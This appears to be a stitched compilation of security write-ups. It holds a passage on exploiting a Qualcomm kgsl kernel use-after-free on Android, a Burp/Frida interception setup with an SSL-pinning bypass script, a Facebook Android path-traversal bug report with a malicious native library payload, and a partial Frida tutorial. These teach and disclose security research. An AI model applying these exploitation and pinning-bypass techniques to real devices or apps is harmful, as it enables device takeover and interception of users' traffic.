  1. First allocate a number of DMA buffers. By manipulating the ion heap, (which I’ll go through later in this post), I can place some useful data behind one of these DMA buffers. I will call this buffer DMA_1.
  2. Use the adsprpc driver to allocate SWIOTLB buffers associated with these DMA buffers. I’ll arrange it so that the DMA_1 occupies the first SWIOTLB (which means all other SWIOTLB will be allocated behind it), call this SWIOTLB_1. This can be done easily as SWIOTLB are simply allocated as a contiguous array.
  3. Use the read/write primitive in the previous section to trigger out-of-bounds read/write on DMA_1. This will either write the memory behind DMA_1 to the SWIOTLB behind SWIOTLB_1, or vice versa.
  4. As the SWIOTLB behind SWIOTLB_1 are mapped to the other DMA buffers that I controlled, I can use the DMA_BUF_IOCTL_SYNC ioctl of these DMA buffers to either read data from these SWIOTLB or write data to them. This translates into arbitrary read/write of memory behind DMA_1.

The following figure illustrates this with a simplified case of two DMA buffers.

figure

Replacing the sg_table

So far, I planned an exploitation strategy based on the assumption that I already have control of the scatterlist sgl of the free’d sg_table. In order to actually gain control of it, I need to replace the free’d sg_table with a suitable object. This turns out to be the most complicated part of the exploit. While there are well-known kernel heap spraying techniques that allows us to replace a free’d object with controlled data (for example the sendmsg and setxattr), they cannot be applied directly here as the sgl of the free’d sg_table here needs to be a valid pointer that points to controlled data. Without a way to leak a heap address, I’ll not be able to use these heap spraying techniques to construct a valid object. With this bug alone, there is almost no hope of getting an info leak at this stage. The other alternative is to look for other suitable objects to replace the sg_table. A CodeQL query can be used to help looking for suitable objects:

from FunctionCall fc, Type t, Variable v, Field f, Type t2
where (fc.getTarget().hasName("kmalloc") or
       fc.getTarget().hasName("kzalloc") or
       fc.getTarget().hasName("kcalloc"))
      and
      exists(Assignment assign | assign.getRValue() = fc and
             assign.getLValue() = v.getAnAccess() and
             v.getType().(PointerType).refersToDirectly(t)) and
      t.getSize() < 128 and t.fromSource() and
      f.getDeclaringType() = t and
      (f.getType().(PointerType).refersTo(t2) and t2.getSize() <= 8) and
      f.getByteOffset() = 0
select fc, t, fc.getLocation()

In this query, I look for objects created via kmallockzalloc or kcalloc that are of size smaller than 128 (same bucket as sg_table) and have a pointer field as the first field. However, I wasn’t able to find a suitable object, although filename allocated in getname_flags came close:

struct filename *
getname_flags(const char __user *filename, int flags, int *empty)
{
	struct filename *result;
    ...
	if (unlikely(len == EMBEDDED_NAME_MAX)) {
        ...
		result = kzalloc(size, GFP_KERNEL);
		if (unlikely(!result)) {
			__putname(kname);
			return ERR_PTR(-ENOMEM);
		}
		result->name = kname;
		len = strncpy_from_user(kname, filename, PATH_MAX);
        ...

with name points to a user controlled string and can be reached using, for example, the mknod syscall. However, not being able to use null character turns out to be too much of a restriction here.

Just-in-time object replacement

Let’s take a look at how the free’d sg_table is used, say, in __ion_dma_buf_begin_cpu_access, it seems that at some point in the execution, the sgl field is taken from the sgl_table, and the sgl_table itself will no longer be used, but only the cached pointer value of sgl is used:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
					  enum dma_data_direction direction,
					  bool sync_only_mapped)
{
    
		if (sync_only_mapped)
			tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,    //<------- `sgl` got passed, and `table` never used again
						  a->table->nents,
						  &buffer->vmas,
						  direction, true);
		else
			dma_sync_sg_for_cpu(a->dev, a->table->sgl,
					    a->table->nents, direction);

While source code could be misleading as auto function inlining is common in kernel code (in fact ion_sgl_sync_mapped is inlined), the bottom line is that, at some point, the value of sgl will be cached in registry and the state of the original sg_table will not affect the code path anymore. So if I am able to first replace a->table with another sg_table, then deleting this new sg_table using sg_free_table will also cause the sgl to be deleted, but of course, there will be clean up logic that sets sgl to NULL. But what if I set up another thread to delete this new sg_table after sgl had already been cached in the registry? Then it won’t matter if sgl is set to NULL, because the value in the registry will still be pointing to the original scatterlist, and as this scatterlist is now free’d, this means I will now get a use-after-free of sgl directly in ion_sgl_sync_mapped. I can then use the sendmsg to replace it with controlled data. There is one major problem with this though, as the time between sgl being cached in registry and the time where it is used again is very short, it is normally not possible to fit the entire sg_table replacement sequence within such a short time frame, even if I race the slowest cpu core against the fastest.

To resolve this, I’ll use a technique by Jann Horn in Exploiting race conditions on [ancient] Linux, which turns out to still work like a charm on modern Android.

To ensure that each task(thread or process) has a fair share of the cpu time, the linux kernel scheduler can interrupt a running task and put it on hold, so that another task can be run. This kind of interruption and stopping of a task is called preemption (where the interrupted task is preempted). A task can also put itself on hold to allow other task to run, such as when it is waiting for some I/O input, or when it calls sched_yield(). In this case, we say that the task is voluntarily preempted. Preemption can happen inside syscalls such as ioctl calls as well, and on Android, tasks can be preempted except in some critical regions (e.g. holding a spinlock). This means that a thread running the DMA_BUF_IOCTL_SYNC ioctl call can be interrupted after the sgl field is cached in the registry and be put on hold. The default behavior, however, will not normally give us much control over when the preemption happens, nor how long the task is put on hold.

To gain better control in both these areas, cpu affinity and task priorities can be used. By default, a task is run with the priority SCHED_NORMAL, but a lower priority SCHED_IDLE, can also be set using the sched_setscheduler call (or pthread_setschedparam for threads). Furthermore, it can also be pinned to a cpu with sched_setaffinity, which would only allow it to run on a specific cpu. By pinning two tasks, one with SCHED_NORMAL priority and the other with SCHED_IDLE priority to the same cpu, it is possible to control the timing of the preemption as follows.

  1. First have the SCHED_NORMAL task perform a syscall that would cause it to pause and wait. For example, it can read from a pipe with no data coming in from the other end, then it would wait for more data and voluntarily preempt itself, so that the SCHED_IDLE task can run;
  2. As the SCHED_IDLE task is running, send some data to the pipe that the SCHED_NORMAL task had been waiting on. This will wake up the SCHED_NORMAL task and cause it to preempt the SCHED_IDLE task, and because of the task priority, the SCHED_IDLE task will be preempted and put on hold.
  3. The SCHED_NORMAL task can then run a busy loop to keep the SCHED_IDLE task from waking up.

In our case, the object replacement sequence goes as follows:

  1. Obtain a free’d sg_table in a DMA buffer using the method in the section Getting a free’d object with a fake out-of-memory error.
  2. First replace this free’d sg_table with another one that I can free easily, for example, making another call to IOCTL_KGSL_GPUOBJ_IMPORT will give me a handle to a kgsl_mem_entry object, which allocates and owns a sg_table. Making this call immediately after step one will ensure that the newly created sg_table replaces the one that was free’d in step one. To free this new sg_table, I can call IOCTL_KGSL_GPUMEM_FREE_ID with the handle of the kgsl_mem_entry, which will free the kgsl_mem_entry and in turn frees the sg_table. In practice, a little bit more heap manipulation is needed as IOCTL_KGSL_GPUOBJ_IMPORT will allocate another object of similar size before allocating a sg_table.
  3. Set up a SCHED_NORMAL task on, say, cpu_1 that is listening to an empty pipe.
  4. Set up a SCHED_IDLE task on the same cpu and have it wait until I signal it to run DMA_BUF_IOCTL_SYNC on the DMA buffer that contains the sg_table in step two.
  5. The main task signals the SCHED_IDLE task to run DMA_BUF_IOCTL_SYNC.
  6. The main task waits a suitable amount of time until sgl is cached in registry, then send data to the pipe that the SCHED_NORMAL task is waiting on.
  7. Once it receives data, the SCHED_NORMAL task goes into a busy loop to keep the DMA_BUF_IOCTL_SYNC task from continuing.
  8. The main task then calls IOCTL_KGSL_GPUMEM_FREE_ID to free up the sg_table, which will also free the object pointed to by sgl that is now cached in the registry. The main task then replaces this object by controlled data using sendmsg heap spraying. This gives control of both dma_address and dma_length in sgl, which are used as arguments to memcpy.
  9. The main task signals the SCHED_NORMAL task on cpu_1 to stop so that the DMA_BUF_IOCTL_SYNC task can resume.

The following figure illustrates what happens in an ideal world.

figure

The following figure illustrates what happens in the real world.

figure

Crazy as it seems, the race can actually be won almost every time, and the same parameters that control the timing would even work on both the Galaxy A71 and Pixel 4. Even when the race failed, it does not result in a crash. It can, however, crash, if the SCHED_IDLE task resumes too quickly. For some reason, I only managed to hold that task for about 10-20ms, and sometimes this is not long enough for the object replacement to complete.

The ion heap

Now that I’m able to replace the scatterlist with controlled data and make use of the read/write primitives in the section Allocating a SWIOTLB, it is time to think about what data I can place behind the DMA buffers.

To allocate DMA buffers, I need to use the ion allocator, which will allocate from the ion heap. There are different types of ion heaps, but not all of them are suitable, because I need one that would allocate buffers with addresses greater than 32 bit. The locations of various ion heap can be seen from the kernel log during a boot, the following is from Galaxy A71:

[    0.626370] ION heap system created
[    0.626497] ION heap qsecom created at 0x000000009e400000 with size 2400000
[    0.626515] ION heap qsecom_ta created at 0x00000000fac00000 with size 2000000
[    0.626524] ION heap spss created at 0x00000000f4800000 with size 800000
[    0.626531] ION heap secure_display created at 0x00000000f5000000 with size 5c00000
[    0.631648] platform soc:qcom,ion:qcom,ion-heap@14: ion_secure_carveout: creating heap@0xa4000000, size 0xc00000
[    0.631655] ION heap secure_carveout created
[    0.631669] ION heap secure_heap created
[    0.634265] cleancache enabled for rbin cleancache
[    0.634512] ION heap camera_preview created at 0x00000000c2000000 with size 25800000

As we can see, some ion heap are created at fixed locations with fixed sizes. The addresses of these heaps are also smaller than 32 bits. However, there are other ion heaps, such as the system heap, that does not have a fixed address. These are the heaps that have addresses higher than 32 bits. For the exploit, I’ll use the system heap.

DMA buffers allocated on the system heap is allocated via the ion_system_heap_allocate function call. It’ll first try to allocate a buffer from a preallocated memory pool. If the pool is full, then it’ll allocate more pages using alloc_pages:

static void *ion_page_pool_alloc_pages(struct ion_page_pool *pool)
{
	struct page *page = alloc_pages(pool->gfp_mask, pool->order);
    ...
	return page;
}

and recycle the pages back to the pool after the buffer is freed.

This later case is more interesting because if the memory is allocated from the initial pool, then any out-of-bounds read/write are likely to just be reading and writing other ion buffers, which is only going to be user space data. So let’s take a look at alloc_pages.

The function alloc_pages allocates memory with page granularity using the buddy allocator. When using alloc_pages, the second parameter order specifies the size of the requested memory and the allocator will return a memory block consisting of 2^order contiguous pages. In order to exploit overflow of memory allocated by the buddy allocator, (a DMA buffer from the system heap), I’ll use the results from Exploiting the Linux kernel via packet sockets by Andrey Konovalov. The key point is that, while objects allocated from kmalloc and co. (i.e. kmallockzalloc and kcalloc) are allocated via the slab allocator, which uses preallocated memory blocks (slabs) to allocate small objects, when the slabs run out, the slab allocator will use the buddy allocator to allocate a new slab. The output of proc/slabinfo gives an indication of the size of slabs in pages.

kmalloc-8192        1036   1036   8192    4    8 : tunables    0    0    0 : slabdata    262    262      0
...
kmalloc-128       378675 384000    128   32    1 : tunables    0    0    0 : slabdata  12000  12000      0

In the above, the 5th column indicates the size of the slabs in pages. So for example, if the size 8192 bucket runs out, the slab allocator will ask the buddy allocator for a memory block of 8 pages, which is order 3 (2^3=8), to use as a new slab. So by exhausting the slab, I can cause a new slab to be allocated in the same region as the ion system heap, which could allow me to over read/write kernel objects allocated via kmalloc and co.

Manipulating the buddy allocator heap

As mentioned in Exploiting the Linux kernel via packet sockets, for each order, the buddy allocator maintains a freelist and use it to allocate memory of the appropriate order. When a certain order (n) runs out of memory, it’ll try to look for free blocks in the next order up, split it in half and add it to the freelist in the requested order. If the next order is also full, it’ll try to find space in the next higher up order, and so on. So by keep allocating pages of order 2^n, eventually the freelist will be exhausted and larger blocks will be broken up, which means that consecutive allocations will be adjacent to each other.

In fact, after some experimentation on Pixel 4, it seems that after allocating a certain amount of DMA buffers from the ion system heap, the allocation will follow a very predicatble pattern.

  1. The addresses of the allocated buffers are grouped in blocks of 4MB, which corresponds to order 10, the highest order block on Android.
  2. Within each block, a new allocations will be adjacent to the previous one, with a higher address.
  3. When a 4MB block is filled, allocations will start in the beginning of the next block, which is right below the current 4MB block.

The following figure illustrates this pattern.

figure

So by simply creating a large amount of DMA buffers in the ion system heap, the likelihood would be that the last allocated buffer will be allocated in front of a «hole» of free memory, and the next allocation from the buddy allocator is likely to be inside this hole, provided the requested number of pages fits in this hole.

The heap spraying strategy is then very simple. First allocate a sufficient amount of DMA buffers in the ion heap to cause larger blocks to break up, then allocate a large amount of objects using kmalloc and co. to cause a new slab to be created. This new slab is then likely to fall into the hole behind the last allocated DMA buffer. Using the use-after-free to overflow this buffer then allows me to gain arbitrary read/write of the newly created slab.

Defeating KASLR and leaking address to DMA buffer

Initially, I was experimenting with the binder_open call, as it is easy to reach (just do open("/dev/binder")) and will allocate a binder_proc struct:

static int binder_open(struct inode *nodp, struct file *filp)
{
    ...
	proc = kzalloc(sizeof(*proc), GFP_KERNEL);
	if (proc == NULL)

which is of size 560 and will persist until the /dev/binder file is closed. So it should be relatively easy to exhaust the kmalloc-1024 slab with this. However, after dumping the results of the out-of-bounds read, I noticed that a recurring memory pattern:

00011020: 68b2 8e68 c1ff ffff 08af 5109 80ff ffff  h..h......Q.....
00011030: 0000 0000 0000 0000 0100 0000 0000 0000  ................
00011040: 0000 0200 1d00 0000 0000 0000 0000 0000  ................
...

The 08af 5109 80ff ffff in the second part of the first line looks like an address that corresponds to kernel code. Indeed, it is the address of binder_fops:

# echo 0 > /proc/sys/kernel/kptr_restrict                                                                                                                                                
# cat /proc/kallsyms | grep ffffff800951af08                                                                                                                                                 
ffffff800951af08 r binder_fops

So looks like these are file struct of the binder files that I opened and what I’m seeing here is the field f_ops that points to the binder_fops. Moreover, the 32 bytes after f_ops are the same for every file struct of the same type, which offers a pattern to identify these files. So by reading the memory behind the DMA buffer and looking for this pattern, I can locate the file structs that belong to the binder devices that I opened.

Moreover, the file struct contains a mutex f_pos_lock, which contains a field wait_list:

struct mutex {
	atomic_long_t		owner;
	spinlock_t		wait_lock;
    ...
	struct list_head	wait_list;
...
};

which is a standard doubly linked list in linux:

struct list_head {
	struct list_head *next, *prev;
};

When wait_list is initialized, the head of the list will just be a pointer to itself, which means that by reading the next or prev pointer of the wait_list, I can obtain the address of the file struct itself. This will then allow me to work out the address of the DMA buffer which I can control because the offset between the file struct and the buffer is known. (By looking at its offset in the data that I dumped, in this example, the offset is 0x11020).

By using the address of binder_fops, it is easy to work out the KASLR slide and defeat KASLR, and by knowing the address of a controlled DMA buffer, I can use it to store a fake file_operations («vtable» of file struct) and overwrite f_ops of my file struct to point to it. The path to arbitrary code execution is now clear.

  1. Use the out-of-bounds read primitive gained from the use-after-free to dump memory behind a DMA buffer that I controlled.
  2. Search for binder file structs within the memory using the predictable pattern and get the offset of the file struct.
  3. Use the identified file struct to obtain the address of binder_fops and the address of the file struct itself from the wait_list field.
  4. Use the binder_fops address to work out the KASLR slide and use the address of the file struct, together with the offset identified in step two to work out the address of the DMA buffer.
  5. Use the out-of-bounds write primitive gained from the use-after-free to overwrite the f_ops pointer to the file that corresponds to this file struct (which I owned), so that it now points to a fake file_operation struct stored in my DMA buffer. Using file operations on this file will then execute functions of my choice.

Since there is nothing special about binder files, in the actual exploit, I used /dev/null instead of /dev/binder, but the idea is the same. I’ll now explain how to do the last step in the above to gain arbitrary kernel code execution.

Getting arbitrary kernel code execution

To complete the exploit, I’ll use «the ultimate ROP gadget» that was used in An iOS hacker tries Android of Brandon Azad (and I in fact stole a large chunk of code from his exploit). As explained in that post, the function __bpf_prog_run32 can be used to invoke eBPF bytecode supplied through the second argument:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

to invoke eBPF bytecode, I need to set the second argument to point to the location of the bytecode. As I already know the address of a DMA buffer that I control, I can simply store the bytecode in the buffer and use its address as the second argument to this call. This would allow us to perform arbitrary memory load/store and call arbitrary kernel functions with up to five arguments and a 64 bit return value.

There is, however one more detail that needs taking care of. Samsung devices implement an extra protection mechanism called the Realtime Kernel Protection (RKP), which is part of Samsung KNOX. Research on the topic is widely available, for example, Lifting the (Hyper) Visor: Bypassing Samsung’s Real-Time Kernel Protection by Gal Beniamini and Defeating Samsung KNOX with zero privilege by Di Shen.

For the purpose of our exploit, the more recent A Samsung RKP Compendium by Alexandre Adamski and KNOX Kernel Mitigation Byapsses by Dong-Hoon You are relevant. In particular, A Samsung RKP Compendium offers a thorough and comprehensive description of various aspects of RKP.

Without going into much details about RKP, the two parts that are relevant to our situation are:

  1. RKP implements a form of CFI (control flow integrity) check to make sure that all function calls can only jump to the beginning of another function (JOPP, jump-oriented programming prevention).
  2. RKP protects important data structure such as the credentials of a process so they are effectively read only.

Point one means that even though I can hijack the f_ops pointer of my file struct, I cannot jump to an arbitrary location. However, it is still possible to jump to the start of any function. The practical implication is that while I can control the function that I call, I may not be able to control call arguments. Point two means that the usual shortcut of overwriting credentials of my own process to that of a root process would not work. There are other post-exploitation techniques that can be used to overcome this, which I’ll briefly explain later, but for the exploit of this post, I’ll just stop short at arbitrary kernel code execution.

In our situation, point one is actually not a big obstacle. The fact that I am able to hijack the file_operations, which contains a whole array of possible calls that are thin wrappers of various syscalls means that it is likely to find a file operation with a 64 bit second argument which I can control by making the appropriate syscall. In fact, I don’t even need to look that far. The first operation, llseek fits the bill:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
    ...

This function takes a 64 bit integer, loff_t as the second argument and can be invoked by calling the lseek64 syscall:

off_t lseek64(int fd, off_t offset, int whence);

where offset translates directly into loff_t in llseek. So by overwriting the f_ops pointer of my file to have its llseek field point to __bpf_prog_run32, I can invoke any eBPF program of my choice any time I call lseek64, without even the need to trigger the bug again. This gives me arbitrary kernel memory read/write and code execution.

As explained before, because of RKP, it is not possible to simply overwrite process credentials to become root even with arbitrary kernel code execution. However, as pointed out in Mitigations are attack surface, too by Jann Horn, once we have arbitrary kernel memory read and write, all the userspace data and processes are essentially under control and there are many ways to gain control over privileged user processes, such as those with system privilege to effectively gain system privileges. Apart from the concrete technique mentioned in that post for accessing sensitive data, another concrete technique mentioned in Galaxy’s Meltdown — Exploiting SVE-2020-18610 is to overwrite the kernel stack of privileged processes to gain arbitrary kernel code execution as a privileged process. In short, there are many post exploitation techniques available at this stage to effectively root the phone.

Conclusion

In this post I looked at a use-after-free bug in the Qualcomm kgsl driver. The bug was a result of a mismatch between the user supplied memory type and the actual type of the memory object created by the kernel, which led to incorrect clean up logic being applied when an error happens. In this case, two common software errors, the ambiguity in the role of a type, and incorrect handling of errors, played together to cause a serious security issue that can be exploited to gain arbitrary kernel code execution from a third-party app.

While great progress has been made in sandboxing the userspace services in Android, the kernel, in particular vendor drivers, remain a dangerous attack surface. A successful exploit of a memory corruption issue in a kernel driver can escalate to gain the full power of the kernel, which often result in a much shorter exploit bug chain.

The full exploit can be found here with some set up notes.

Next week I’ll be going through the exploit of Chrome issue 1125614 (GHSL-2020-165) to escape the Chrome sandbox from a beta version of Chrome.

Android Security Testing: Setting up burp suite with Android VM/physical device

Android Security Testing: Setting up burp suite with Android VM/physical device

Original test by Sarvesh Sharma

Setting up the Burp suite with an android device is simple but a little tricky.

There are several ways to set up this environment.
1. Setting up Burp suite with Android VM (Needs Genymotion with virtual box).
2. Setting up Burp suite with Android physical Device (Needs Rooted android device).

Setting up Burp suite with Android VM (Needs Genymotion with virtual box) or with Android physical device.

Follow the below-mentioned steps:
Prerequisite:
i. Burp suite.
ii. Genymotion (With virtual box.).

or

ii. Android device (Rooted.).
iii. adb tools. Click here to download.
iv. Setting up proxy and Certificate in Android VM/device.
v. Frida installed in host PC and Frida server file to run Frida from the Android device. (python installed in the host machine.(PC/laptop))

i. Burp Suite.

Step 1: Certificate export: Open Burp Suite. Go to Proxy → Options → Proxy Listener → click on import/ export CA certificate. → At the export choose Certificate in DER format.(eg. cacert.der) → Click on next → select any file name having extension as .der → Click on next.

Image for post
Burp Certificate export

Step 2: Go to the folder where you saved the Burp CA certificate. → Change the extension from .der to .crt (eg. cacert.crt)→ and save it.

Step 3: Proxy setting in burp: Go to Proxy → Options → Proxy Listener → Click on add → Select specific address and then select IP of the device where burp is running or Simply select All interfaces (It will intercept traffic all the traffic going through your system.). → Enable this config.

Image for post
Burp Proxy setting

ii. Genymotion (With virtual box.).

Step 1: Installing Genymotion: Download Genymotion (Please select with the virtual box) from Click here to download. → Register with Genymotion → Login → Click on Add icon to add a new Virtual Device. → Select Android API according to Android version → select Device from the list → Click on Next. (Recommended device and settings are in the attached screenshots.)

Image for post
Genymotion Download
Image for post
VM device select
Image for post
VM device settings

Step 3: Install Open Gapps/Google Play Services:

  1. Power on the VM device.
  2. Click on Open Gapps icon on side bar. Follow the steps and it will automatically download and install Gapps in your VM device.

or

ii. Android Physical Device.

Note: We need an android device having Android OS version 6.0 or newer. Along with this we need to root the device (there are different ways to root the device, flashing Magisk is one of the popular and recommended way to root an android device.).

Step 1: Just plug in the android device with USB cable into the system where want to capture the traffic.

iii. ADB tools. Click here to download.:

you can download ABD tools from Click hereIt will redirect to a page where you can select the ADB tools package according to your host machine. Select “sdk for winodws/mac/linux”. and then select the required terms and download. extract the tools at any location.(at this location you need to navigate in cmd/terminal when need to use ADB tools). ADB tools are useful while doing the out of the box stuff on Android, like direct installing an app in device from your laptop/pc or pushing any file directly to any location. (We will see the use of ADB in the upcoming steps.)

To globally install ADB tools: go to start in windows → search for “edit the system environment variables”. → open it → in advance tab → Environment variables → select and edit PATH in system variables → Click on New → paste the path of ADB tools directory (where you extracted, Downloaded ADB tools zip.).

iv. Setting up proxy and Certificate in Android VM/device.

Step 1: Setting up the proxy in Android: Power on the Android device/Android VM from Genymotion (If it shows IP related error at bootup, then go to virtual box start the device listed there and power off after it gets an IP.) → Go to Settings → go to WIFI → Hold on Wifi name listed there and select Modify Network. → Select proxy as Manual → Input Hostname as you Host machine’s IP/Port which was used to set as proxy listener at Burp proxy setting → Save.

Image for post
Setup Proxy in android

Step 2: Setting up the burp Certificate in Android:

Open cmd/terminal. Move to the directory where ADB tools are present.

Push burp certificate to the android device: There are two ways to add a certificate in the Android device.
i. Adding a Certificate into user-defined certificates.: (Recommanded) push burp certificate (having extension as .crt) using the command

"adb push path_to_certificate /sdcard/Download/".

Switch to android device → Go to settings → Security → install from Sdcard → Select the certificate from Download folder → it will ask to enter a name, Enter any name here (eg. Burp CA). → It will ask to add PIN security. → Enter the security Pin. → Next.

ii. Adding a Certificate into system-defined certificates.: Download and install OpenSSL form Click here. → open cmd and run command
"openssl x509 -inform DER -in path_to_certificate/cacert.der -out path_to_certificate/cacert.pem"
then run.
"openssl x509 -inform PEM -subject_hash_old -in cacert.pem"
it will show as hash value copy it save it for further use.
then run .
"mv path_to_certificate/cacert.pem path_to_certificate/<hash>.0" or simply rename the file cacert.pem as <hash_value>.0
Now copy the certificate tot the device. here is the list of commands to execute.
"adb remount" →
"adb push <hash_value>.0 /sdcard/Download" →
"adb shell" →
"mv /sdcard/Download/<hash_value>.0 /system/etc/security/cacerts/" →
"chmod 644 /system/etc/security/cacerts/<hash_value>.0"

Note: The benefit of adding a burp certificate into system-defined certificates is, we don’t need to follow step V. which is Frida setup. (But it’s not a recommended way because sometimes it misses some API calls.)
Reference: https://enderspub.kubertu.com/burp-suite-ssl-pinning

V. Frida installation in host PC and running frida server from Android device.

Step 1: Installation Frida in the host PC: run command to install Frida in host pc “pip install frida-tools«.

Step 2: Running Frida from android device:

  1. run command “adb shell getprop ro.product.cpu.abi» to know the processor architecture. →
  2. download the Frida server file from Click here. (Select your file according to the processor architecture if arm than arm file and if it is x86 than select x86 file.) →
  3. extract tile xz file → copy the file which is present in the extracted folder to the android device via the command “adb push ./frida-server-12.x.y-android-xyz /data/local/tmp/» →
  4. Now disable SELinux (This is one time process.): “adb shell» → in the shell: «su» → «setenforce 0«.
  5. Start Frida server by command: “adb shell» → «/data/local/tmp/frida-server-12.x.y-android-xyz &«

Step 3: Creating js file to do SSL pinning.: This needs to fix certificate-related errors and capture traffic in Burp suite.
create a js file named frida-ssl-pin.jsAnd paste the following content in it and save the file.

Java.perform(function() {

var array_list = Java.use(“java.util.ArrayList”);
var ApiClient = Java.use(‘com.android.org.conscrypt.TrustManagerImpl’);

ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log(‘Bypassing SSL Pinning’);
var k = array_list.$new();
return k;
}

}, 0);

Step 4: Running the Frida receiver/client from the host machine.:

  1. Open the app in android device. now find the process name by running the command from cmd: “frida-ps -U«. and copy the process name.
  2. run Frida receiver/client by running the command: “frida -U -l path_to_js_file/frida-ssl-2.js --no-paus -f com.example.application«. This will open the app again.. and now you are ready to capture traffic in Burp Suite.

Special Notes:

  1. Whenever the device restarts, We need to repeat the steps of running the Frida server from the android device.
  2. In the case mentioned in point 1, we need to start the Frida receiver/client in the host machine also.

Please let me know in case of any query….

Arbitrary code execution on Facebook for Android through download feature

Original text by Sayed Abdelhafiz

L;DR

Recently I discovered an ACE on Facebook for Android that can be triaged through download file from group Files Tab without open the file.

Background

I was digging on the method that Facebook use to download files from group, I have found that Facebook use tow different mechanism to download files. If the user download the file from the post itself It will be downloaded via built-in android service called DownloadManager as far as I know It safe method to download files. If the user decide to download the file from Files Tab It will be downloaded through different method, In nutshell the application will fetch the file then will save it to Download directory without any filter.

Image for post

Notice: the selected code is the fix that Facebook pushed. The vulnerable code was without this code.

Path traversal

The vulnerability was in the second method, security measures was implemented on the server side when uploading the files but It was easy to bypass. Simply the application fetch the download file and for example save the file to /sdcard/Downloads/FILE_NAME without filter the FILE_NAME to protect against path traversal attacks. First idea came to my mind is use path traversal to overwrite native libraries which will leads to execute arbitrary code.

I have set up my burp suite proxy then Intercepted upload file request and modify the filename to ../../../sdcard/PoC then forward the request.

Image for post
Web upload endpoint

Unfortunately It wasn’t enough due of the security measures on the server side, my path traversal payload was removed. I decide to play with the payload but unfortunately no payload worked.

Image for post

Bypass security measures. (Bypass?)

After many payloads, I wasn’t able to bypass that filter. I came back to browse the application again may find something useful, It came!

Image for post

For first time, I noticed that I can upload files via Facebook mobile application. set-up burp suite proxy on my phone, enable white-hat settings on the application to bypass SSL pinning, intercepted upload file request, modify the filename to ../../../sdcard/PoC, file uploaded successfully and my payload is in the filename now!

I tried to download the file from the post, but DownloadManger service is safe as I told so the attack didn’t work. Navigated to Files Tab, download the file. And here is our attack. My file was wrote to /sdcard/PoC!

As I was able to preform path traversal, I can now overwrite the native libraries and preform ACE attack.

Exploit

To exploit that attack I start new android NDK project to create native library, put my evil code on JNI_OnLoad function to make sure that the evil code will execute when loaded the library.

#include <jni.h>
#include <string>
#include <stdlib.h>JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system(“id > /data/data/com.facebook.katana/PoC”);
return JNI_VERSION_1_6;
}

I built the project to get my malicious library, then upload it by mobile upload endpoint and renamed it to /../../../../../data/data/com.facebook.katana/lib-xzs/libbreakpad.so

Our exploit now is ready!

PoC Video: https://youtu.be/j0darcE5apo

Timeline

April 29, 2020 at 5:57 AM: Subbmited the report to facebook.
April 29, 2020 at 11:20 AM: Facebook were able to reproduce it.
April 29, 2020 at 12:17 PM: Traiged.
June 16, 2020 at 12:54 PM: Vulnerability has been fixed.
July 15, 2020 at 5:11 PM: Facebook rewarded me $10,000!

Bounty

I noticed people commented on the amount of bounty when I tweet about the bug, It small? I was shocked and objected to it and tried to discuss Facebook, but noway they say that amount is fair and they won’t revisiting this decision. As Neal told me: Spencer provided you with insight into how we determined the bounty for this issue. We believe the amount awarded is reasonable and will not be revisiting this decision.

It’s up to you to decide before you report your vulnerabilities! Vendor or?

Have a nice day!

TUTORIAL – UNIVERSAL ANDROID SSL PINNING IN 10 MINUTES WITH FRIDA

( Original text BY OMESPINO)

Hi everyone It’s been a while from my last post but I’m back , now I want to show you that you can start hacking android apps with frida without pain, I took me several hours to figure out how to get the frida installation ready but at the end that wasn’t really really difficult, the main problem is that I didn’t found a pretty clear tutorial for beginners in mobile security like me, so that’s why decided to create this 10 min tutorial. if you want to skip frida description you can go directly to Step 0 to start frida installation

So what is frida, exactly? 

Extracted from frida website:
“It’s Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.”

So basically frida is a tool that let you inject scripts to native apps (in this case Android apps) to modify the application behavoir (in this case make a ssl pinning bypass and can perform a MitM attack, even if the aplication has https / ssl connections) and make dynamic test in real time.

Disclaimer: this method won’t work with applications that uses HSTS (HTTP Strict Transport Security) per example facebook, instagram, twitter, paypal, banking apps, etc, but don’t worry most applications don’t uses this protocol yet.

Step 0 – set up the enviroment


computer

– python 2.7 

– pip for python

– adb tools (Android Debug Bridge tools)

– local proxy (Burpsuite by Larry_lau, just kidding Burpsuite comunnity edition) 

android phone

– android device rooted (in my case oneplus one with android 8.1) or

– android emulator with android 4.4.4 to 8.1 

Step 1 – install frida on your computer

  • # installing frida via terminal, sometimes you need to run this command as sudo
  • pip install frida

Step 2 – install frida-server on your device

Since there are a lot kind of android devices arquitechtures we need to find out what processor have our device so we need to connect our device to the computer (with usb debugger option activated) and then  run this following command:

  • # getting the processor arquitecture in this case is ARM, there are also x86, x86_64, etc …
  • adb shell getprop ro.product.cpu.abi
  • ouput: armeabi-v7a

well, after know the arch now we can download the properly frida-server version for our device, in this case frida-server-XX.X.X-android-arm in this frida github releases link (since the lastest version didn’t work I highly recommend download this version frida-server-12.0.5-android-arm.xz, anyway you can try with newer version if you want to), once is downloaded we need to extract the frida server and then copy it to the device

  • # extracting frida-server binary from the xz file
  • # for linux distributions
  • tar -xJf frida-server-12.0.5-android-arm.xz
  • # for macOS or BSD based
  • unxz frida-server-12.0.5-android-arm.xz
  • # then we need to copy the frida-server binary to the device with adb
  • adb push ./frida-server-12.0.5-android-arm /data/local/tmp/

Step 3 – Hello process in frida (frida’s Hello world)

Once we have installed frida(computer) and frida-server (android) we can start interacting with frida with the following commands:

  • # first we need to start frida-server with this adb command
  • # the last ‘&’ is to run the command in background
  • # disable SELinux is very important I was looking about 4 hours trying to see what happened and SELinux was preventing the success frida-server execution, also frida-server must run as root
  • setenforce 0
  • adb shell ‘su -c /data/local/tmp/frida-server-12.0.5-android-arm &’
  • # then if everything works you can see frida’s hello world with
  • # frida-ps is for list the devices process and -U flag is for usb devices
  • frida-ps -U

Step 5 – Set up Burpsuite comunnity edition

